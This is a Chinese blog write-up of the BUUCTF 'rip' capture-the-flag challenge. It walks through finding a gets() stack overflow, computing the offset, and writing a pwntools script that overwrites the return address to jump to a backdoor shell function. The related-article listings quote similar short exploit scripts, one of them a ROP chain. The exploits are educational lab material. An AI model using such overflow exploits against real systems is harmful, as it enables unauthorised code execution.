[每日一PWN]BUUCTF RIP

最新推荐文章于 2024-05-16 14:26:38 发布
最新推荐文章于 2024-05-16 14:26:38 发布
阅读量251 收藏 1
点赞数
分类专栏: 每日一PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55233040/article/details/127942146
版权

前言

比赛隐身,反思结束,从头详细记录一下,每日记录一题,第一题的nc就不用记了,所以直接从第二题rip开始。

保护模式

首先checksec看一下
在这里插入图片描述
64位小端序,部分地址随机化

溢出点

放进IDA看一眼
在这里插入图片描述

偏移计算

主函数里可以看到gets函数这个注入点,从上面的rbp-Fh判断是距离rbp寄存器还有Fh也就是15个偏移,加上rbp寄存器自身的8个偏移,也就是到返回地址需要23个偏移。
如果对IDA的数据拿不准的话,也可以放到pwndbg调试一下看看:
用cyclic创建200个字符的数据然后运行并输入:
在这里插入图片描述
完成后看看rbp寄存器的值:
在这里插入图片描述
复制其前四位然后用cyclic计算偏移:
在这里插入图片描述
可见确实是15偏移,加上rbp自身的8偏移就是23偏移

后门函数

然后在IDA中,我们很容易可以找到这道题的后门函数
在这里插入图片描述
也就是说,只需要将函数跳转到此即可,那么先看一眼fun函数的位置
在这里插入图片描述

攻击脚本

from pwn import *
p=remote('IP',PORT)
payload=b'a'*23+p64(0x401187)
p.sendline(payload)
p.interactive()

简单解释一下,这个脚本的作用也就是用无用字符a覆盖掉前面23个偏移地址的空间,然后将返回地址覆盖为0x401187,之所以覆盖为0x401187而不是0x401186,是因为运行的时候发现因为堆栈不平衡而运行失败(堆栈平衡请自行百度吧,要写在这里的话长度得多几倍),刚好0x401186是一个影响栈平衡的push命令,所以跳过这一步,使用0x401187即可。

悸动战士cosmos
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2024NKCTF-pwn
03-25
2024NKCTF_pwn
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4896
BUU CTF PWN 入门知识详解
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2453
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTF题解_buuctf题目答案(1)
最新发布
2401_84968504的博客
05-16 294
5.N种方式解决6.乌镇峰会种图题目:synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}解法:根据synt可以看出这是一个凯撒加密的题目,设置的偏移量为13题目:… .-… — …- . -.-- — …-解法:这种纯【.-】组成的密码就是摩斯密码题目:姓名:张三 生日:19900315key格式为key{xxxxxxxxxx}解法:这是一道社工题,key中间的位数正好等于zs+生日题目:加密密文:afZ_r9VYfScOeO_UL^RWUc 格式:flag{ }解法:凯
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1143
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2582
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
【CTF】rip--堆栈的简单认识
qq_48201589的博客
04-08 507
BUUCTF-rip解题思路
PWN.rar_PWN
09-24
然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在讨论的是一个在Keil uVision3环境下用C语言编写的代码,它利用了片上PGA(Programmable Gain Amplifier,可...
pwn入门题目汇总.rar
09-01
"pwn"是网络安全领域中的一个术语,全称是"pwnable",通常用于描述与缓冲区溢出、代码注入等技术相关的挑战或比赛。这类问题涉及到计算机系统的内存管理和安全漏洞利用,是逆向工程和信息安全研究的重要部分。本...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_site/文件夹 使用netlify deploy进行netlify deploy 网站信息: 主题: 主持人: 作者: 克里斯·亨特( )
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 337
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
BUUCTFrip
^_^
12-08 3258
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
[buuctf] rip
zn106414的博客
03-31 685
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1094
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTF -rip
weixin_56301399的博客
07-20 383
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1700
[BUUCTF]-rip 题目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5639
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值